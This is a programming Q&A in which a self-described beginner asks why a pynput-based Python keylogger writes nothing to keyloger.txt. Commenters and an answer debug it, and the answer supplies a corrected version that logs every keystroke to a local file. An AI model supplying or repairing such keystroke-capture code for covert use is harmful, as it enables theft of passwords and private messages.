# .txt file not showing anything with f.write

Tags: python

I'm kinda new to this stuff im doing this just for educttinal purpose im using [this link](https://www.youtube.com/watch?v=TbMKwl11itQ&fbclid=IwAR22_zzG0j6wTCP10m15596KPueM-e7UQ54bKDXTzs5Xr3mB5N9eFGO_9T0) to write the code but the thing is I can't understand why the `keyloger.txt` is not working.

I tried deleting the file and changing 
`("keyloger.txt","a")` to `("keyloger.txt","w")`. 
And when that happens no file is created.

This my code:

```
import pynput
from pynput.keyboard import Key, Listener

count = 0
keys = []

def on_press(key):
    global keys, count
    keys.append(Key)
    count += 1
    print("{0} pressed".format(key))

if count >= 10:
    count = 0
    write_file(keys)
    keys = []

def write_file(keys):
    with open ("keyloger.txt","w+") as f:
        for key in keys:
            f.write(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()
```

Comment: try to change it to `w+`

Comment: It seems like this is not all the code you are using. Try to provide a [mre]. What if `count` is less then 10 and the function is never called? @Joel why? `w+` is for reading. `w` should create a new file so the problem is obviously not there

Comment: Did you check if the functions gets called? and if `keys` is not empty when it is called?

Comment: @Tomerikoo `w+` `Open for reading and writing.  The file is created if it does not
         exist, otherwise it is truncated.  The stream is positioned at
         the beginning of the file.` Maybe something to do with file-permissinos etc on his system - if that's the case, he'd notice. @victor - your indentation is wrong on the if-case.

Comment: When OP uses `a` the file is empty, when uses `w` the file is not created. My guess is that the function `write_file` is never called. Sadly, with the information in the question we can't help more than this

Comment: keys.append(capital K Key) looks wrong too....

Answer (score 0):

Right now your file is being modified/created in one place only - inside the `write_file` function.

Also, your `write_file` function is being called only in one place - under the `if count ...`. The problem is that this piece of code is being executed **once, at the start of the program**. So in that point, `count = 0` and nothing happens.

I believe what you meant is to do this check on each click, so just indent the `if` to be inside the `on_press` function:

```py
def on_press(key):
    global keys, count
    keys.append(key)
    count += 1
    print("{0} pressed".format(key))

    if count >= 10:
        count = 0
        write_file(keys)
        keys = []
```

This way on each 10<sup>th</sup> press, the file will be written and the `count` and `keys` will be reset.